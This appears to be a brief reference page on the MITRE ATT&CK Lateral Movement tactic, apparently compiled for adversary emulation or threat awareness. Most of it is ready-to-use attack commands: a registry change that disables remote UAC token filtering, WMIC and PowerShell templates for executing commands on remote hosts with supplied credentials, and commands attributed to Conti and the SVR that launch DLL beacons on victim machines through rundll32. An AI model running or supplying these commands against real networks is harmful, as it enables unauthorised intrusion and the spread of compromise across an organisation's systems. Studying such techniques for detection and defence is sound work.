Lateral Movement
The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/
Disable Remote UAC Restrictions
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fWMIC
WMI allows users with the required privileges to execute commands in remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries used the following commands to execute commands in a remote host.
wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"Or, with PowerShell:
Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>Conti TTP
wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"Russian Foreign Intelligence Service (SVR) TTP
wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"Last updated